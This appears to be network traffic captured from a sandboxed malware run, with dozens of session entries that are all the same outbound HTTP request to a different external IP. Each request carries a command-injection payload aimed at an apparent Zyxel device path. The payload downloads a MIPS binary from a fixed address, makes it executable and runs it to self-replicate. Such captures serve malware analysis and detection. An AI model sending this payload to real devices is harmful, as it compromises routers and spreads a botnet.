                                                Jan 12, 2024 18:24:25.594990969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1904192.168.2.13373941.137.28.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.595046043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1905192.168.2.1359292102.129.103.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.595084906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1906192.168.2.1355428165.220.199.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.595117092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1907192.168.2.1356028111.252.71.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.595141888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1908192.168.2.1341710173.235.88.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.595196009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1909192.168.2.1360858209.191.57.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.595225096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1910192.168.2.1357050182.123.226.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.595256090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1911192.168.2.1340008217.46.227.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.595313072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1912192.168.2.1341342183.152.14.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.595362902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1913192.168.2.1334112221.43.118.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.595401049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1914192.168.2.1356764152.249.100.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.595432997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1915192.168.2.1333374184.183.160.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.595474958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1916192.168.2.1337510145.152.48.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.595500946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1917192.168.2.135311693.234.23.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.595546961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1918192.168.2.1360234140.12.228.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.595582962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1919192.168.2.134543840.141.222.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.595618010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1920192.168.2.1360476200.190.6.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.595659971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1921192.168.2.1354336105.212.119.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.595690966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1922192.168.2.133638689.142.15.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.595722914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1923192.168.2.134341274.153.128.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.595773935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1924192.168.2.1346988157.143.242.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.595796108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1925192.168.2.135774034.162.86.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.595835924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1926192.168.2.1358980203.195.161.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.595885992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1927192.168.2.1360928142.244.120.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.595921040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1928192.168.2.1345690116.70.99.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.595964909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1929192.168.2.133438275.137.178.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.596009016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1930192.168.2.135100884.46.252.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.596060038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1931192.168.2.1359376135.228.87.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.596095085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1932192.168.2.1339840137.102.7.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.596117020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1933192.168.2.134533884.55.170.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.596157074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1934192.168.2.135971498.100.244.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.596214056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1935192.168.2.133782425.152.19.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.596261978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1936192.168.2.1340318119.184.233.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.596292973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1937192.168.2.135962232.132.125.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.596321106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1938192.168.2.1351454161.16.129.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.596371889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1939192.168.2.1359270102.95.18.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.596400976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1940192.168.2.135308887.53.143.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.596426010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1941192.168.2.134823238.203.179.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.596487045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1942192.168.2.134579287.115.58.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.596517086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1943192.168.2.135091289.121.35.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.596537113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1944192.168.2.1343514189.159.191.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.596594095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1945192.168.2.133735852.218.170.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.596626997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1946192.168.2.1338964126.129.14.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.596663952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1947192.168.2.1335908114.144.7.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.596693039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1948192.168.2.135262488.17.191.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.596748114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1949192.168.2.1345028201.178.202.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.600472927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1950192.168.2.1333810161.175.252.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.600507975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1951192.168.2.1348142163.7.118.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.600529909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1952192.168.2.1357594141.206.181.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.600581884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1953192.168.2.1344680204.87.136.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.600634098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1954192.168.2.136041487.47.254.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.600673914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1955192.168.2.1348004159.130.78.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.600706100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1956192.168.2.135358279.59.45.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.600749016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1957192.168.2.1348422159.225.98.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.600778103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1958192.168.2.135432623.215.47.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.609075069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1959192.168.2.1339440196.183.138.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.609119892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1960192.168.2.135061419.11.165.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.609149933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1961192.168.2.13420168.8.246.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.609193087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1962192.168.2.1342346194.26.174.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.609241009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1963192.168.2.135943437.251.200.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.609287977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1964192.168.2.1344360117.75.126.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.609325886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1965192.168.2.1344580145.46.237.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.609371901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1966192.168.2.1353684134.37.62.31443
                                                TimestampBytes transferredDirectionData
